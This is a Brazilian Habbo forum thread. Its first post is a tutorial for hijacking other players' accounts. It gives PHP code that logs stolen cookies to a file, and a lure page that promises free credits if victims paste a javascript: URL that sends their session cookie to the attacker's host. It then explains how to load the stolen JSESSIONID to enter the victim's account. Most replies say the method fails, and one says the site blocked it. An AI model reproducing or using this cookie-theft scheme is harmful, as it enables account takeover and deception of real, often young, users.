Habbo Tools Ajuda
Olá, ja é registrado?nParabéns, você é um membro do maior forum Habbo do Brasil!nnNÃO PRECISA CONFIRMAR EMAILnNão é registrado?nRegistre-se e descubra o maior forum Habbo do Brasil!nnHTA Forum - O maior forum de Habbo do Brasil

Xss / vulnerabilidade no security_check do habbo.

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

Xss / vulnerabilidade no security_check do habbo.

Mensagem por 'PhoeniX em Ter 23 Nov - 5:29:39

Olá
dia 22 foi descoberto uma vulnerabilidade no habbo, sendo que o "hacker" criando uma pagina mal-intencionada faça que os cookies da vitima seja enviada para ele!
TUTORIAL
1° Proucure um servidor que suporte php e rewrite
recomendo:
freewebhosting!
crie uma conta lá
selecione um endereço convicente para a pagina steal paasswrd
lá crie tudo direitinho e dps va em seu [Você precisa estar registrado e conectado para ver este link.]
o meu no caso é:
eu5org.freewebhostingarea.com/ftp/index.php
como selecionei o eu5.org server,
lá coloque eu5.org no 1° campo e no segudno seu site que criou e embaixo a senha...
entre...
crie um novo arquivo em new file no topo no lado direito da pagina...
no conteudo coloque
tire os


Código:
<?php
ob_start();
$cookie1=$_GET['cookie1'];
$cookie2=$_GET['cookie2'];
$handle=fopen('cookiejar.txt', 'a');
fwrite($handle, "Cookie: " .$cookie1.$cookie2. "\n");
fclose ($handle);

header("Location: http://habbo.com.br/me");
?>

salve com X.php
volte na setinha que tem na parte esquerda..
crie outro arquivo com o nome : cookiejar.txt
salve,
volte...
agora selecione o arquivo cookiejar.txt
e crique em permissões no topo lado direito
agora em chmod nas permissões coloque 777 salve e volte na setinha...
crie um arquivo com o nome de t.php e no conteudo coloque:
tire os
e mude o seusite.com para o site que vc colocou!



Código:
<title> Novo Bug </title>

<center>
<b>Copie o codigo abaixo e cole na sua pagina inicial e ganhe 99c!
<font color="red">
javascript:window.location='http://seusite.com/X.php?cookie1='%2bencodeURI(document·cookie.substring(0, 400))%2b'%26cookie2='%2bencodeURI(document·cookie.substring(401, 800));
</font>

agora mande para seus amigos:
seusite.com/t.php
mude seusite.com para o site que vc colokou na hora de cadastrar!
o bobo vai colokar o java na pagina e vai mandar a sessão para o arquivo: cookiejar.txt
va em:
seusite.com/cookiejar.txt
pegue a parte JSESSIONID=PEGUE ESSE CODIGO
va no firefox e baixe no site da mozzila o cookie editor
entre e uma conta fake,
va no cookies editor e mude o cookies jessionid para o da vitima salva o cookie e atualiza a pagina principal!
ta na conta da vitima!

Créditos: Drizer

'PhoeniX
Membro Gold
Membro Gold

Posts : 373

Sexo : Masculino

Local : Ex-Administrador

Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por UpDaTe em Ter 23 Nov - 7:49:47

Aff nem funfa,eu executei numa conta fake,n foi pro arquivo cookiejar.txt,e fui tentar entrar na conta fake pra testar denovo,a senha n dava mais,ou seja : Algem Hackeou '

'-' ainda bem q foi a fake ' Very Happy

UpDaTe
Popular
Popular

Posts : 249

Idade : 18

Sexo : Masculino

Local : Em frente ao pc xD

Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por J-Z em Ter 23 Nov - 9:02:09

Não funciona.

J-Z
Fundador
Fundador

Posts : 20994

Idade : 18

Sexo : Masculino


Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por p.p.542 em Ter 23 Nov - 9:29:00

n intendi nada

p.p.542
Membro Gold
Membro Gold

Posts : 683

Idade : 18

Sexo : Masculino

Local : Aqui no Forum.

Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por ’¡¤TioHank¤!’ em Ter 23 Nov - 9:42:52

No funfo '-'

’¡¤TioHank¤!’
Membro Gold
Membro Gold

Posts : 603

Idade : 17

Sexo : Masculino

Local : \o/

Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por Live em Ter 23 Nov - 12:26:00

Não Funciona :/

Live
Participativo
Participativo

Posts : 198

Idade : 20

Sexo : Masculino


Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por 'PhoeniX em Ter 23 Nov - 13:13:19

Aqui funciona ._. e J-Z se não funciona pode dar closed...

@edit
vocês baixaram o cookie editor no firefox?

'PhoeniX
Membro Gold
Membro Gold

Posts : 373

Sexo : Masculino

Local : Ex-Administrador

Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por J-Z em Ter 23 Nov - 14:01:32

Não dei closed '-'
OBS: Eles não tão falando que o Cookie Editor não funciona e sim que os cookies não chegam no cookiejar.txt

J-Z
Fundador
Fundador

Posts : 20994

Idade : 18

Sexo : Masculino


Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por p.p.542 em Ter 23 Nov - 14:33:25

n prescisa dar closed

eu ainda to boiando no ki eh pra fazer

p.p.542
Membro Gold
Membro Gold

Posts : 683

Idade : 18

Sexo : Masculino

Local : Aqui no Forum.

Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por  em Ter 23 Nov - 14:51:22

Phoenix, por favor apaga o tópico..
sim.. é o Drizer...



Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por 'PhoeniX em Ter 23 Nov - 15:03:07

escreveu:Phoenix, por favor apaga o tópico..
sim.. é o Drizer...

No drizer eu confio, mais você não tá on line no habbo, pode ser qualquer trouxa ai me enganando...
Se for você mesmo malz ai então (:

'PhoeniX
Membro Gold
Membro Gold

Posts : 373

Sexo : Masculino

Local : Ex-Administrador

Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por  em Dom 3 Abr - 22:19:14

ook



Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por  em Sab 30 Abr - 17:33:13

aff eu fiz tudo correto,mas entrei em fike e eu mesmo colei o codigo e tal,mas fui olhar tinha nada no arquivo cookiejar.txt,poderia corrigir algo errado ai,ou postar o topico denovo porem PERFEITO,vcs são os caras....



Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por  em Dom 1 Maio - 11:20:50

Onde fica esse cookies jessionid ? não achei



Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por  em Sab 7 Maio - 18:25:56

n fucional '



Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por  em Ter 17 Maio - 14:26:13

Aki não pegou tentei mais nem funfou tipo nao ta chegando os dados cookiejar.txt, nao chega nada na hora que envia lá



Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por Dark90God em Ter 17 Maio - 19:20:15

Tentei fazer e não funfo

Dark90God
Popular
Popular

Posts : 267

Idade : 19

Sexo : Masculino

Local : Nova Prospekt

Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por  em Qua 25 Maio - 10:19:26

Funfa sim , o só que o habbo bloqueou o trafico de cookies então o jsessionid não pega mais .-.



Voltar ao Topo Ir em baixo

Re: Xss / vulnerabilidade no security_check do habbo.

Mensagem por Conteúdo patrocinado Hoje à(s) 16:20:42


Conteúdo patrocinado


Voltar ao Topo Ir em baixo

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo

- Tópicos similares

 
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum